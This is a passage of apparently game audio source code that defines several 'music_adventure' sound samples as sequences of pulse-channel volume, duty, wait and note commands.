AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_VOL_DSLIDE(2,10,1) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(50,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(2) CHAN_VOLUME_HIGH(1) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(2) CHAN_VOLUME_HIGH(1) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(2) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(11,11) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_VOL_DSLIDE(2,10,1) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(1) SAMPLE_END .) music_adventure_sample_1: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(41,1,2,9,0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(44,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(11,11) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(44,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(43,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(44,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(43,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(39,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(11,11) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_VOL_DSLIDE(1,10,1) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(2) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) SAMPLE_END .) music_adventure_sample_2: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(41,1,2,9,0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(44,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(11,11) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_VOL_DSLIDE(2,10,1) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(53,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(56,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(11,11) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_VOL_DSLIDE(2,10,1) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(2) AUDIO_PULSE_META_NOTE_DUT_VOL(58,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(0) AUDIO_PULSE_META_NOTE_DUT_VOL(53,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(2) CHAN_VOLUME_HIGH(1) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(2) CHAN_VOLUME_HIGH(1) PLAY_TIMED_NOTE(0,53) CHAN_VOLUME_HIGH(2) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(11,11) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(53,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) SAMPLE_END .) music_adventure_sample_3: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(55,1,2,9,0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(56,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(55,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(53,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(51,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(11,11) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(3,0) AUDIO_PULSE_META_WAIT_VOL_DSLIDE(2,10,1) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(44,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(43,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(41,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,34) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,32) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,31) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) SAMPLE_END .) music_adventure_sample_4: .( AUDIO_PULSE_META_NOTE_DUT_VOL(56,1,2,3) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,55) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,53) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(7) WAIT(3) CHAN_VOLUME_HIGH(6) WAIT(2) CHAN_VOLUME_HIGH(5) WAIT(2) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(0) AUDIO_PULSE_META_NOTE_DUT_VOL(51,1,2,3) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(7) WAIT(3) CHAN_VOLUME_HIGH(6) WAIT(2) CHAN_VOLUME_HIGH(5) WAIT(1) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,53) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(7) WAIT(3) CHAN_VOLUME_HIGH(6) WAIT(2) CHAN_VOLUME_HIGH(5) WAIT(2) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) SAMPLE_END .) music_adventure_sample_5: .( AUDIO_PULSE_META_NOTE_DUT_VOL(56,1,2,3) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,55) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,53) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(7) WAIT(3) CHAN_VOLUME_HIGH(6) WAIT(2) CHAN_VOLUME_HIGH(5) WAIT(2) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(7) WAIT(3) CHAN_VOLUME_HIGH(6) WAIT(2) CHAN_VOLUME_HIGH(5) WAIT(2) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,53) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(7) WAIT(3) CHAN_VOLUME_HIGH(6) WAIT(2) CHAN_VOLUME_HIGH(5) WAIT(2) CHAN_VOLUME_HIGH(4) WAIT(1) CHAN_VOLUME_HIGH(3) WAIT(1) CHAN_VOLUME_HIGH(2) WAIT(1) CHAN_VOLUME_HIGH(1) WAIT(1) CHAN_VOLUME_HIGH(0) WAIT(1) CHAN_VOLUME_LOW(7) WAIT(1) CHAN_VOLUME_LOW(6) WAIT(1) CHAN_VOLUME_LOW(5) WAIT(1) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_LOW(3) WAIT(0) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) SAMPLE_END .) music_adventure_sample_6: .( AUDIO_PULSE_META_NOTE_DUT_VOL(51,1,2,3) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,53) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) 